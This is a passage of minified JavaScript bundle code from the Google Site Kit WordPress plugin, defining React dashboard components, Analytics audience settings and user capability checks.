HelpText({className:e,children:i}){return(0,l.jsx)("p",{className:n()("googlesitekit-banner__help-text",e),children:i})}Description.propTypes={className:a().string,description:a().oneOfType([a().string,a().node]),learnMoreLink:a().shape(c.A.propTypes),additionalDescription:a().oneOfType([a().string,a().node]),children:a().node},HelpText.propTypes={className:a().string,children:a().node};var g=t(71189),u=t(61983);function Footer({className:e,children:i}){return(0,l.jsx)("div",{className:n()("googlesitekit-banner__footer",e),children:i})}Footer.propTypes={className:a().string,children:a().node};var N=t(25797);const j=(0,r.forwardRef)(({className:e,titleIcon:i,title:t,description:o,additionalDescription:s,errorText:a,helpText:r,learnMoreLink:M,dismissButton:c,ctaButton:j,svg:d,footer:D},y)=>{const z=(0,I.dv)(),m=z===I.mp||z===I.Lg;let T=null;m&&d?.mobile?T=d.mobile:!m&&d?.desktop&&(T=d.desktop);const p=d?.verticalPosition?d.verticalPosition:"center";return(0,l.jsxs)("div",{ref:y,className:n()("googlesitekit-banner",e),children:[(0,l.jsxs)("div",{className:"googlesitekit-banner__content",children:[i&&(0,l.jsx)(TitleIcon,{children:i}),(0,l.jsx)(Title,{children:t}),(0,l.jsx)(Description,{description:o,learnMoreLink:M,additionalDescription:s}),r&&(0,l.jsx)(HelpText,{children:r}),a&&(0,l.jsx)(N.A,{type:"error",description:a}),(0,l.jsxs)("div",{className:"googlesitekit-notice__action",children:[j&&(0,l.jsx)(g.A,{...j}),c?.onClick&&(0,l.jsx)(u.A,{...c})]})]}),T&&(0,l.jsx)("div",{className:n()("googlesitekit-banner__svg-wrapper",{[`googlesitekit-banner__svg-wrapper--${p}`]:p}),style:{backgroundImage:`url(${T})`}}),D&&(0,l.jsx)(Footer,{children:D})]})});j.propTypes={titleIcon:a().node,title:a().string,description:a().oneOfType([a().string,a().node]),additionalDescription:a().oneOfType([a().string,a().node]),errorText:a().string,helpText:a().string,learnMoreLink:a().shape(c.A.propTypes),dismissButton:a().shape(u.A.propTypes),ctaButton:a().shape(g.A.propTypes),svg:a().shape({desktop:a().elementType,mobile:a().elementType,verticalPosition:a().oneOf(["top","center","bottom"])}),footer:a().node};const d=j},84730:(e,i,t)=>{t.d(i,{FQ:()=>s,He:()=>r,bI:()=>a,rq:()=>n,ui:()=>o});const o="warning-notification-gtg",n="gtg-setup-cta",s={ERROR_HIGH:30,ERROR_LOW:60,WARNING:100,INFO:150,SETUP_CTA_HIGH:150,SETUP_CTA_LOW:200},a={HEADER:"notification-area-header",DASHBOARD_TOP:"notification-area-dashboard-top",OVERLAYS:"notification-area-overlays"},r={DEFAULT:"default",SETUP_CTAS:"setup-ctas"}},84895:(e,i,t)=>{t.d(i,{G:()=>n,t:()=>o});const o=new Set(t.g?._googlesitekitBaseData?.enabledFeatures||[]);function n(e,i=o){return i instanceof Set&&i.has(e)}},84984:(e,i,t)=>{t.d(i,{fh:()=>Cell,xA:()=>g,fI:()=>M});var o=t(62688),n=t.n(o),s=t(4452),a=t.n(s),r=t(62540);function Cell(e){const{className:i,alignTop:t,alignMiddle:o,alignBottom:n,alignRight:s,alignLeft:I,smAlignRight:l,mdAlignRight:M,lgAlignRight:c,smSize:g,smStart:u,smOrder:N,mdSize:j,mdStart:d,mdOrder:D,lgSize:y,lgStart:z,lgOrder:m,size:T,children:p,...S}=e;return(0,r.jsx)("div",{...S,className:a()(i,"mdc-layout-grid__cell",{"mdc-layout-grid__cell--align-top":t,"mdc-layout-grid__cell--align-middle":o,"mdc-layout-grid__cell--align-bottom":n,"mdc-layout-grid__cell--align-right":s,"mdc-layout-grid__cell--align-left":I,"mdc-layout-grid__cell--align-right-phone":l,"mdc-layout-grid__cell--align-right-tablet":M,"mdc-layout-grid__cell--align-right-desktop":c,[`mdc-layout-grid__cell--span-${T}`]:12>=T&&T>0,[`mdc-layout-grid__cell--span-${y}-desktop`]:12>=y&&y>0,[`mdc-layout-grid__cell--start-${z}-desktop`]:12>=z&&z>0,[`mdc-layout-grid__cell--order-${m}-desktop`]:12>=m&&m>0,[`mdc-layout-grid__cell--span-${j}-tablet`]:8>=j&&j>0,[`mdc-layout-grid__cell--start-${d}-tablet`]:8>=d&&d>0,[`mdc-layout-grid__cell--order-${D}-tablet`]:8>=D&&D>0,[`mdc-layout-grid__cell--span-${g}-phone`]:4>=g&&g>0,[`mdc-layout-grid__cell--start-${u}-phone`]:4>=u&&u>0,[`mdc-layout-grid__cell--order-${N}-phone`]:4>=N&&N>0}),children:p})}Cell.propTypes={smSize:n().number,smStart:n().number,smOrder:n().number,mdSize:n().number,mdStart:n().number,mdOrder:n().number,lgSize:n().number,lgStart:n().number,lgOrder:n().number,size:n().number,alignTop:n().bool,alignMiddle:n().bool,alignBottom:n().bool,alignRight:n().bool,alignLeft:n().bool,smAlignRight:n().bool,mdAlignRight:n().bool,lgAlignRight:n().bool,className:n().string,children:n().node},Cell.defaultProps={className:"",size:0,smSize:0,smStart:0,smOrder:0,mdSize:0,mdStart:0,mdOrder:0,lgSize:0,lgStart:0,lgOrder:0};var I=t(63696);const l=(0,I.forwardRef)(({className:e,children:i,...t},o)=>(0,r.jsx)("div",{ref:o,className:a()("mdc-layout-grid__inner",e),...t,children:i}));l.displayName="Row",l.propTypes={className:n().string,children:n().node},l.defaultProps={className:""};const M=l,c=(0,I.forwardRef)(({alignLeft:e,fill:i,className:t,children:o,collapsed:n,...s},I)=>(0,r.jsx)("div",{className:a()("mdc-layout-grid",t,{"mdc-layout-grid--align-left":e,"mdc-layout-grid--collapsed":n,"mdc-layout-grid--fill":i}),...s,ref:I,children:o}));c.displayName="Grid",c.propTypes={alignLeft:n().bool,fill:n().bool,className:n().string,collapsed:n().bool,children:n().node},c.defaultProps={className:""};const g=c},86780:(e,i,t)=>{t.d(i,{Jy:()=>M,NR:()=>l,gM:()=>I,h4:()=>N,jG:()=>j,op:()=>g,rQ:()=>a,uA:()=>u,uL:()=>c,uV:()=>r,ye:()=>s});t(50539);var o=t(97345),n=t(88273);function s(e){return async({select:i,resolveSelect:t})=>(await t(o.oR).getAuthentication(),i(o.oR).hasScope(e))}function a(){return async({select:e,resolveSelect:i})=>(await i(o.oR).getAuthentication(),!0===e(o.oR).isAuthenticated())}function r(e){return async({select:i,resolveSelect:t})=>(await t(o.oR).getCapabilities(),i(o.oR).canViewSharedModule(e))}function I(e){return async function({resolveSelect:i}){return!0===await i(n.i).isModuleActive(e)}}function l(e){return async function({resolveSelect:i}){return!0===await i(n.i).isModuleConnected(e)}}function M(e){return async({resolveSelect:i})=>!0===await i(n.i).hasModuleOwnership(e)}function c(e){return async({resolveSelect:i})=>!0===await i(n.i).hasModuleAccess(e)}function g(e){return async({resolveSelect:i})=>!0===await i(o.oR).isItemDismissed(e)}function u(){return async({select:e,resolveSelect:i})=>(await i(o.oR).getUserAudienceSettings(),!0===e(o.oR).isAudienceSegmentationWidgetHidden())}function N(e){return async({resolveSelect:i})=>!0===await i(e).isGatheringData()}function j(e){return async({resolveSelect:i})=>!0===await i(n.i).canActivateModule(e)}},88273:(e,i,t)=>{t.d(i,{U:()=>n,i:()=>o});const o="core/modules",n="insufficient_module_dependencies"},94656:(e,i,t)=>{t.d(i,{A:()=>I});var o=t(47209),n=t(62688),s=t.n(n),a=t(63696),r=t(78325);function Portal({children:e,slug:i}){const[t]=(0,a.useState)(document.createElement("div"));return(0,o.A)(()=>{i&&t.classList.add(`googlesitekit-portal-${i}`);const e=document.querySelector(".googlesitekit-plugin")||document.body;return e.appendChild(t),()=>e.removeChild(t)}),(0,r.createPortal)(e,t)}Portal.propTypes={slug:s().string,children:s().node},Portal.defaultProps={slug:"",children:null};const I=Portal},97345:(e,i,t)=>{t.d(i,{$8:()=>a,$Q:()=>u,BT:()=>O,CQ:()=>E,DF:()=>_,GM:()=>x,GT:()=>y,HA:()=>R,HD:()=>g,HP:()=>L,J5:()=>P,JF:()=>k,JK:()=>d,Ml:()=>j,SS:()=>b,UF:()=>M,UY:()=>B,Vl:()=>Z,W6:()=>W,Xq:()=>h,YQ:()=>f,Yw:()=>Y,dV:()=>C,dX:()=>A,ej:()=>l,em:()=>s,ep:()=>p,fu:()=>m,gC:()=>z,hz:()=>N,jx:()=>c,lV:()=>I,nH:()=>U,oR:()=>o,od:()=>r,p3:()=>D,pG:()=>S,qv:()=>n,qy:()=>w,t1:()=>H,t7:()=>Q,tB:()=>T,tK:()=>G,u_:()=>v});const o="core/user",n="connected_url_mismatch",s="__global",a="temporary_persist_permission_error",r="adblocker_active",I=["weekly","monthly","quarterly"],l="googlesitekit_authenticate",M="googlesitekit_setup",c="googlesitekit_view_dashboard",g="googlesitekit_manage_options",u="googlesitekit_read_shared_module_data",N="googlesitekit_manage_module_sharing_options",j="googlesitekit_delegate_module_sharing_management",d="googlesitekit_update_plugins",D="kmAnalyticsAdSenseTopEarningContent",y="kmAnalyticsEngagedTrafficSource",z="kmAnalyticsLeastEngagingPages",m="kmAnalyticsNewVisitors",T="kmAnalyticsPopularAuthors",p="kmAnalyticsPopularContent",S="kmAnalyticsPopularProducts",A="kmAnalyticsReturningVisitors",x="kmAnalyticsTopCities",E="kmAnalyticsTopCitiesDrivingLeads",h="kmAnalyticsTopCitiesDrivingAddToCart",k="kmAnalyticsTopCitiesDrivingPurchases",f="kmAnalyticsTopDeviceDrivingPurchases",w="kmAnalyticsTopConvertingTrafficSource",C="kmAnalyticsTopCountries",L="kmAnalyticsTopPagesDrivingLeads",O="kmAnalyticsTopRecentTrendingPages",b="kmAnalyticsTopTrafficSource",Z="kmAnalyticsTopTrafficSourceDrivingAddToCart",v="kmAnalyticsTopTrafficSourceDrivingLeads",R="kmAnalyticsTopTrafficSourceDrivingPurchases",U="kmAnalyticsPagesPerVisit",P="kmAnalyticsVisitLength",G="kmAnalyticsTopReturningVisitorPages",Q="kmSearchConsolePopularKeywords",Y="kmAnalyticsVisitsPerVisitor",B="kmAnalyticsMostEngagingPages",H="kmAnalyticsTopCategories",W=[D,y,z,m,T,p,S,A,H,x,E,h,k,f,w,C,O,b,Z,U,P,G,Y,B,H],_=[...W,Q]},97513:(e,i,t)=>{t.d(i,{Fo:()=>s,Lg:()=>a,Qb:()=>n,dv:()=>I,mp:()=>r});var o=t(24355);const n="xlarge",s="desktop",a="tablet",r="small";function I(){const e=(0,o.SO)();return e>1280?n:e>960?s:e>600?a:r}}},e=>{e.O(0,[660],()=>{return i=67280,e(e.s=i);var i});e.O()}]);(globalThis.__googlesitekit_webpackJsonp=globalThis.__googlesitekit_webpackJsonp||[]).push([[290,505],{80:(e,t,i)=>{"use strict";i.d(t,{CV:()=>b,Cu:()=>T,K9:()=>a,Kr:()=>I,Lf:()=>m,Oh:()=>n,PW:()=>v,Rx:()=>E,S9:()=>h,TQ:()=>g,Vt:()=>C,Wl:()=>N,ZC:()=>s,ZY:()=>r,_p:()=>D,ag:()=>p,aj:()=>u,bz:()=>_,dq:()=>x,f2:()=>c,fB:()=>j,fV:()=>k,iB:()=>d,kc:()=>l,mo:()=>A,nc:()=>S,rm:()=>f,to:()=>o,wo:()=>y,yn:()=>M});const a="modules/analytics-4",s="account_create",o="property_create",n="webdatastream_create",r="analyticsSetup",l=10,c=0,d="https://www.googleapis.com/auth/tagmanager.readonly",g="enhanced-measurement-form",u="enhanced-measurement-enabled",m="enhanced-measurement-should-dismiss-activation-banner",p="analyticsAccountCreate",I="analyticsCustomDimensionsCreate",h="https://www.googleapis.com/auth/analytics.edit",y="dashboardAllTrafficWidgetDimensionName",A="dashboardAllTrafficWidgetDimensionColor",M="dashboardAllTrafficWidgetDimensionValue",N="dashboardAllTrafficWidgetActiveRowIndex",f="dashboardAllTrafficWidgetLoaded",T={googlesitekit_post_date:{parameterName:"googlesitekit_post_date",displayName:"WordPress Post Date",description:"Created by Site Kit: Date when a post was published",scope:"EVENT"},googlesitekit_post_author:{parameterName:"googlesitekit_post_author",displayName:"WordPress Post Author",description:"Created by Site Kit: WordPress name of the post author",scope:"EVENT"},googlesitekit_post_categories:{parameterName:"googlesitekit_post_categories",displayName:"WordPress Post Categories",description:"Created by Site Kit: Names of categories assigned to a post",scope:"EVENT"},googlesitekit_post_type:{parameterName:"googlesitekit_post_type",displayName:"WordPress Post Type",description:"Created by Site Kit: Content type of a post",scope:"EVENT"}},S={ADD_TO_CART:"add_to_cart",PURCHASE:"purchase",SUBMIT_LEAD_FORM:"submit_lead_form",GENERATE_LEAD:"generate_lead",CONTACT:"contact"},k=[S.CONTACT,S.GENERATE_LEAD,S.SUBMIT_LEAD_FORM],j={"new-visitors":{description:"People who visited the site for the first time",displayName:"New visitors",membershipDurationDays:-1,filterClauses:[{clauseType:"INCLUDE",simpleFilter:{scope:"AUDIENCE_FILTER_SCOPE_ACROSS_ALL_SESSIONS",filterExpression:{andGroup:{filterExpressions:[{orGroup:{filterExpressions:[{dimensionOrMetricFilter:{fieldName:"newVsReturning",stringFilter:{matchType:"EXACT",value:"new"}}}]}},{orGroup:{filterExpressions:[{notExpression:{dimensionOrMetricFilter:{fieldName:"groupId",stringFilter:{matchType:"EXACT",value:"created_by_googlesitekit:new_visitors"}}}}]}}]}}}}]},"returning-visitors":{description:"People who have visited your site at least once before",displayName:"Returning visitors",membershipDurationDays:-1,filterClauses:[{clauseType:"INCLUDE",simpleFilter:{scope:"AUDIENCE_FILTER_SCOPE_ACROSS_ALL_SESSIONS",filterExpression:{andGroup:{filterExpressions:[{orGroup:{filterExpressions:[{dimensionOrMetricFilter:{fieldName:"newVsReturning",stringFilter:{matchType:"EXACT",value:"returning"}}}]}},{orGroup:{filterExpressions:[{notExpression:{dimensionOrMetricFilter:{fieldName:"groupId",stringFilter:{matchType:"EXACT",value:"created_by_googlesitekit:returning_visitors"}}}}]}}]}}}}]}},v="audiencePermissionsSetup",b="audienceTileCustomDimensionCreate",_="audience-selection-panel-expirable-new-badge-",x="audience",C="customDimension",D="property",E=[x,C,D]},674:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s,o=i(63696);function n(){return n=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},n.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>o.createElement("svg",n({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 22 22"},e),a||(a=o.createElement("path",{fillRule:"evenodd",d:"m12.149 7.96-5.166 5.166a.34.34 0 0 0-.094.176l-.35 1.755a.344.344 0 0 0 .404.404l1.755-.35a.34.34 0 0 0 .175-.095l5.166-5.165zm2.301-1.814a1.03 1.03 0 0 0-1.458 0L6.497 12.64a1.03 1.03 0 0 0-.282.527l-.35 1.755a1.03 1.03 0 0 0 1.213 1.213l1.754-.35c.2-.04.383-.139.527-.283l6.495-6.494a1.03 1.03 0 0 0 0-1.459z",clipRule:"evenodd"})),s||(s=o.createElement("path",{d:"m12.149 7.96.117-.116a.165.165 0 0 0-.234 0zm-5.166 5.166-.116-.116zm-.094.176.162.033zm-.35 1.755.161.032zm.404.404.032.162zm1.755-.35.032.161zm.175-.095.117.117zm5.166-5.165.116.116a.165.165 0 0 0 0-.233zm-1.047-3.705.116.116zm1.458 0-.116.116zM6.497 12.64l.117.117zm-.282.527-.162-.032zm-.35 1.755.161.032zm1.213 1.213-.033-.162zm1.754-.35.033.161zm.527-.283.117.117zm6.495-6.494-.117-.117zm0-1.459.117-.116zm-3.822.295L6.867 13.01l.233.233 5.166-5.165zM6.867 13.01a.5.5 0 0 0-.14.26l.324.065a.2.2 0 0 1 .05-.092zm-.14.26-.35 1.754.323.065.351-1.755zm-.35 1.754a.51.51 0 0 0 .598.599l-.064-.324a.18.18 0 0 1-.21-.21zm.598.599 1.755-.35-.065-.325-1.754.351zm1.755-.35a.5.5 0 0 0 .26-.14l-.233-.233a.2.2 0 0 1-.092.048zm.26-.14 5.165-5.166-.233-.233L8.757 14.9zm3.042-7.055 1.89 1.89.233-.234-1.89-1.89zm1.076-1.816a.866.866 0 0 1 1.226 0l.233-.233a1.196 1.196 0 0 0-1.692 0zm-6.494 6.495 6.494-6.495-.233-.233-6.494 6.495zm-.237.443a.87.87 0 0 1 .237-.443l-.233-.233c-.167.167-.281.38-.328.61zm-.35 1.754.35-1.754-.324-.065-.35 1.755zm1.018 1.02a.866.866 0 0 1-1.019-1.02l-.323-.065a1.196 1.196 0 0 0 1.407 1.408zm1.755-.351-1.755.35.065.324 1.755-.35zm.443-.237a.87.87 0 0 1-.443.237l.065.323c.231-.046.444-.16.611-.327zm6.494-6.495-6.494 6.495.233.233 6.495-6.494zm0-1.225a.866.866 0 0 1 0 1.225l.234.234a1.196 1.196 0 0 0 0-1.692zm-1.403-1.404 1.403 1.404.234-.233-1.404-1.404z"})))},1641:(e,t,i)=>{"use strict";i.d(t,{A:()=>ReportErrorActions});var a=i(62688),s=i.n(a),o=i(63696),n=i(13606),r=i(82871),l=i(50539),c=i(49383),d=i(29785),g=i(88273),u=i(13137),m=i(4124),p=i(38432),I=i(62540);function ReportErrorActions(e){const{moduleSlug:t,error:i,GetHelpLink:a,hideGetHelpLink:s,buttonVariant:h,onRetry:y,onRequestAccess:A,getHelpClassName:M,RequestAccessButton:N,RetryButton:f}=e,T=(0,m.A)(),S=(0,l.useSelect)(e=>e(g.i).getModuleStoreName(t)),k=(0,l.useSelect)(e=>"function"==typeof e(S)?.getServiceEntityAccessURL?e(S).getServiceEntityAccessURL():null),j=Array.isArray(i)?i:[i],v=(0,l.useSelect)(e=>j.map(t=>{const i=e(S)?.getSelectorDataForError(t);return{...t,selectorData:i}})),b=v?.filter(e=>(0,u.vl)(e,e.selectorData)&&"getReport"===e.selectorData.name),_=!!b.length,x=(0,l.useSelect)(e=>{const i={..._?b[0]:j[0]};return(0,u.SG)(i)&&(i.code=`${t}_insufficient_permissions`),e(d.O4).getErrorTroubleshootingLinkURL(i)}),C=(0,l.useDispatch)(),D=j.some(e=>(0,u.SG)(e)),E=(0,o.useCallback)(()=>{b.forEach(e=>{const{selectorData:t}=e;C(t.storeName).invalidateResolution(t.name,t.args)}),y?.()},[C,b,y]),w=k&&D&&!T;return(0,I.jsxs)("div",{className:"googlesitekit-report-error-actions",children:[w&&("function"==typeof N?(0,I.jsx)(N,{requestAccessURL:k}):(0,I.jsx)(c.Button,{onClick:A,href:k,target:"_blank",danger:"danger"===h,tertiary:"tertiary"===h,children:(0,r.__)("Request access","google-site-kit")})),_&&(0,I.jsxs)(o.Fragment,{children:["function"==typeof f?(0,I.jsx)(f,{handleRetry:E}):(0,I.jsx)(c.Button,{onClick:E,danger:"danger"===h,tertiary:"tertiary"===h,children:(0,r.__)("Retry","google-site-kit")}),!s&&(0,I.jsx)("span",{className:"googlesitekit-error-retry-text",children:(0,n.A)((0,r.__)("Retry didn’t work? <HelpLink />","google-site-kit"),{HelpLink:(0,I.jsx)(p.A,{href:x,external:!0,hideExternalIndicator:!0,children:(0,r.__)("Get help","google-site-kit")})})})]}),!_&&!s&&(0,I.jsx)("div",{className:M,children:"function"==typeof a?(0,I.jsx)(a,{linkURL:x}):(0,I.jsx)(p.A,{href:x,external:!0,hideExternalIndicator:!0,children:(0,r.__)("Get help","google-site-kit")})})]})}ReportErrorActions.propTypes={moduleSlug:s().string.isRequired,error:s().oneOfType([s().arrayOf(s().object),s().object]).isRequired,GetHelpLink:s().elementType,hideGetHelpLink:s().bool,buttonVariant:s().string,onRetry:s().func,onRequestAccess:s().func,getHelpClassName:s().string,RequestAccessButton:s().elementType,RetryButton:s().elementType}},3170:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 22 19"},e),a||(a=s.createElement("path",{fill:"currentColor",d:"M0 19h22L11 0zm12-3h-2v-2h2zm0-4h-2V8h2z"})))},4124:(e,t,i)=>{"use strict";i.d(t,{A:()=>o});var a=i(20697),s=i(62659);function o(){const e=(0,s.A)();return a.Nn.includes(e)}},4169:(e,t,i)=>{"use strict";i.d(t,{N$:()=>s,aO:()=>o,qB:()=>a});const a={BOXES:"boxes",COMPOSITE:"composite"},s={QUARTER:"quarter",HALF:"half",FULL:"full"},o="core/widgets"},4751:(e,t,i)=>{"use strict";i.d(t,{A:()=>c});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(97513),l=i(62540);function PreviewBlock({className:e,width:t,height:i,shape:a,padding:s,smallWidth:o,smallHeight:c,tabletWidth:d,tabletHeight:g,desktopWidth:u,desktopHeight:m}){const p=(0,r.dv)(),I={width:{[r.mp]:o,[r.Lg]:d,[r.Fo]:u,[r.Qb]:u},height:{[r.mp]:c,[r.Lg]:g,[r.Fo]:m,[r.Qb]:u}};return(0,l.jsx)("div",{className:n()("googlesitekit-preview-block",e,{"googlesitekit-preview-block--padding":s}),style:{width:I.width[p]||t,height:I.height[p]||i},children:(0,l.jsx)("div",{className:n()("googlesitekit-preview-block__wrapper",{"googlesitekit-preview-block__wrapper--circle":"circular"===a})})})}PreviewBlock.propTypes={className:s().string,width:s().string,height:s().string,shape:s().string,padding:s().bool,smallWidth:s().string,smallHeight:s().string,tabletWidth:s().string,tabletHeight:s().string,desktopWidth:s().string,desktopHeight:s().string},PreviewBlock.defaultProps={className:void 0,width:"100px",height:"100px",shape:"square",padding:!1,smallWidth:void 0,smallHeight:void 0,tabletWidth:void 0,tabletHeight:void 0,desktopWidth:void 0,desktopHeight:void 0};const c=PreviewBlock},5664:(e,t,i)=>{"use strict";i.d(t,{$:()=>s});var a=i(63696);function s(e,t=0){(0,a.useEffect)(()=>{let a,s=!1;function o(){a=i.g.setTimeout(()=>{s=!0},t)}function n(){i.g.clearTimeout(a),s&&(s=!1,e())}return i.g.addEventListener("focus",n),i.g.addEventListener("blur",o),()=>{i.g.removeEventListener("focus",n),i.g.removeEventListener("blur",o),i.g.clearTimeout(a)}},[t,e])}},5704:(e,t,i)=>{"use strict";i.d(t,{c:()=>s,v:()=>o});var a=i(9577);function s(e){if((0,a.X)(e))return e.match(/pub-\d+$/)[0]}function o(e){if((0,a.H)(e))return e.match(/pub-\d+$/)[0]}},5855:(e,t,i)=>{"use strict";i.d(t,{A:()=>d});var a=i(4452),s=i.n(a),o=i(62688),n=i.n(o),r=i(63696),l=i(62540);const c=(0,r.forwardRef)(({label:e,className:t,hasLeftSpacing:i=!1,...a},o)=>(0,l.jsx)("span",{ref:o,...a,className:s()("googlesitekit-badge",t,{"googlesitekit-badge--has-left-spacing":i}),children:e}));c.displayName="Badge",c.propTypes={label:n().string.isRequired,hasLeftSpacing:n().bool};const d=c},5856:(e,t,i)=>{"use strict";i.d(t,{gy:()=>SelectionPanelFooter,W4:()=>SelectionPanelHeader,y3:()=>SelectionPanelItem,DW:()=>SelectionPanelItems,Ay:()=>b});var a=i(4452),s=i.n(a),o=i(62688),n=i.n(o),r=i(4544),l=i.n(r),c=i(21795),d=i(78174),g=i(63696),u=i(19266),m=i(94656),p=i(62540);function SideSheet({className:e,children:t,isOpen:i,isLoading:a,onOpen:o=()=>{},closeSheet:n=()=>{},focusTrapOptions:r={}}){const I=(0,g.useRef)();return(0,g.useEffect)(()=>{i?(o(),document.body.classList.add("googlesitekit-side-sheet-scroll-lock")):document.body.classList.remove("googlesitekit-side-sheet-scroll-lock")},[i,o]),(0,c.A)(I,n),(0,d.A)(e=>i&&u._f===e.keyCode,n),(0,p.jsxs)(m.A,{children:[(0,p.jsx)(l(),{active:!!i&&!a,focusTrapOptions:{fallbackFocus:"body",...r},children:(0,p.jsx)("section",{ref:I,className:s()("googlesitekit-side-sheet",e,{"googlesitekit-side-sheet--open":i}),role:"dialog","aria-modal":"true","aria-hidden":!i,tabIndex:"0",children:t})}),i&&(0,p.jsx)("span",{className:"googlesitekit-side-sheet-overlay"})]})}function SelectionPanel({children:e,isOpen:t,isLoading:i,onOpen:a,closePanel:o,className:n}){const r=n?.split(/\s+/).map(e=>`.${e}`).join(""),l=r?`${r} .googlesitekit-selection-panel-item .googlesitekit-selection-box input`:".googlesitekit-selection-panel-item .googlesitekit-selection-box input";return(0,p.jsx)(SideSheet,{className:s()("googlesitekit-selection-panel",n),isOpen:t,isLoading:i,onOpen:a,closeSheet:o,focusTrapOptions:{initialFocus:l},children:e})}SideSheet.propTypes={className:n().string,children:n().node,isOpen:n().bool,isLoading:n().bool,onOpen:n().func,closeSheet:n().func,focusTrapOptions:n().object},SelectionPanel.propTypes={children:n().node,isOpen:n().bool,isLoading:n().bool,onOpen:n().func,closePanel:n().func,className:n().string};var I=i(38432),h=i(72545),y=i(33052);function SelectionPanelHeader({children:e,title:t,onCloseClick:i}){return(0,p.jsxs)("header",{className:"googlesitekit-selection-panel-header",children:[(0,p.jsxs)("div",{className:"googlesitekit-selection-panel-header__row",children:[(0,p.jsx)(y.A,{as:"h3",size:"small",type:"headline",children:t}),(0,p.jsx)(I.A,{className:"googlesitekit-selection-panel-header__close",onClick:i,linkButton:!0,children:(0,p.jsx)(h.A,{width:"15",height:"15"})})]}),e]})}SelectionPanelHeader.propTypes={children:n().node,title:n().string,onCloseClick:n().func};var A=i(82871),M=i(49383);function SelectionBox({badge:e,checked:t,children:i,disabled:a,id:o,onChange:n,title:r,value:l}){return(0,p.jsx)("div",{className:s()("googlesitekit-selection-box",{"googlesitekit-selection-box--disabled":a}),children:(0,p.jsx)(M.Checkbox,{checked:t,description:i,disabled:a,id:o,name:o,onChange:n,value:l,badge:e,children:r})})}SelectionBox.propTypes={badge:n().node,checked:n().bool,children:n().node,disabled:n().bool,id:n().string,onChange:n().func,title:n().string,value:n().string};var N=i(5855);function SelectionPanelItem({children:e,id:t,slug:i,title:a,description:s,isItemSelected:o,isItemDisabled:n,onCheckboxChange:r,subtitle:l,suffix:c,badge:d,isNewlyDetected:g}){return(0,p.jsxs)("div",{className:"googlesitekit-selection-panel-item",children:[(0,p.jsxs)(SelectionBox,{badge:d,checked:o,disabled:n,id:t,onChange:r,title:a,value:i,children:[l&&(0,p.jsx)("span",{className:"googlesitekit-selection-panel-item__subtitle",children:l}),s,e]}),g&&(0,p.jsx)(N.A,{label:(0,A.__)("New","google-site-kit")}),c&&(0,p.jsx)("span",{className:"googlesitekit-selection-panel-item__suffix",children:c})]})}function SelectionPanelItems({currentSelectionTitle:e=(0,A.__)("Current selection","google-site-kit"),availableItemsTitle:t=(0,A.__)("Additional items","google-site-kit"),savedItemSlugs:i=[],availableSavedItems:a={},availableUnsavedItems:s={},ItemComponent:o,notice:n}){function r(e){return Object.keys(e).map(t=>(0,p.jsx)(o,{slug:t,savedItemSlugs:i,...e[t]},t))}const l=Object.keys(s).length;return(0,p.jsxs)("div",{className:"googlesitekit-selection-panel-items",children:[0!==i.length&&(0,p.jsxs)(g.Fragment,{children:[(0,p.jsx)("p",{className:"googlesitekit-selection-panel-items__subheading",children:e}),(0,p.jsx)("div",{className:"googlesitekit-selection-panel-items__subsection",children:r(a)}),l>0&&(0,p.jsx)("p",{className:"googlesitekit-selection-panel-items__subheading",children:t})]}),l>0&&(0,p.jsx)("div",{className:"googlesitekit-selection-panel-items__subsection",children:r(s)}),n]})}SelectionPanelItem.propTypes={children:n().node,id:n().string,slug:n().string,title:n().string,description:n().string,isItemSelected:n().bool,isItemDisabled:n().bool,onCheckboxChange:n().func,subtitle:n().string,suffix:n().node,badge:n().node,isNewlyDetected:n().bool},SelectionPanelItems.propTypes={currentSelectionTitle:n().string,availableItemsTitle:n().string,savedItemSlugs:n().array,availableSavedItems:n().object,availableUnsavedItems:n().object,ItemComponent:n().elementType,notice:n().node};var f=i(17243),T=i(13606),S=i(50539),k=i(6109),j=i(80),v=i(4751);function SelectionPanelFooter({savedItemSlugs:e=[],selectedItemSlugs:t=[],saveSettings:i=()=>{},minSelectedItemCount:a=0,maxSelectedItemCount:s=0,isBusy:o,onSaveSuccess:n=()=>{},onCancel:r=()=>{},isOpen:l,closePanel:c=()=>{}}){const[d,u]=(0,g.useState)(null),[m,I]=(0,g.useState)(!1),h=(0,S.useSelect)(e=>e(j.K9).isFetchingSyncAvailableAudiences()),y=(0,g.useMemo)(()=>!(0,f.isEqual)((0,k.N9)(t),(0,k.N9)(e)),[e,t]),N=e?.length>0&&y?(0,A.__)("Apply changes","google-site-kit"):(0,A.__)("Save selection","google-site-kit"),b=(0,g.useCallback)(async()=>{const{error:e}=await i(t);e||(n(),c(),u(N),I(!0))},[i,t,n,c,N]),_=(0,g.useCallback)(()=>{c(),r()},[c,r]),[x,C]=(0,g.useState)(null);(0,g.useEffect)(()=>{null!==x&&x!==l&&l&&(u(null),I(!1)),C(l)},[l,x]);const D=t?.length||0,E=h?(0,p.jsx)(v.A,{width:"89px",height:"20px"}):(0,p.jsx)("p",{className:"googlesitekit-selection-panel-footer__item-count",children:(0,T.A)((0,A.sprintf)(/* translators: 1: Number of selected items. 2: Maximum number of items that can be selected. */ /* translators: 1: Number of selected items. 2: Maximum number of items that can be selected. */ (0,A.__)("%1$d selected <MaxCount>(up to 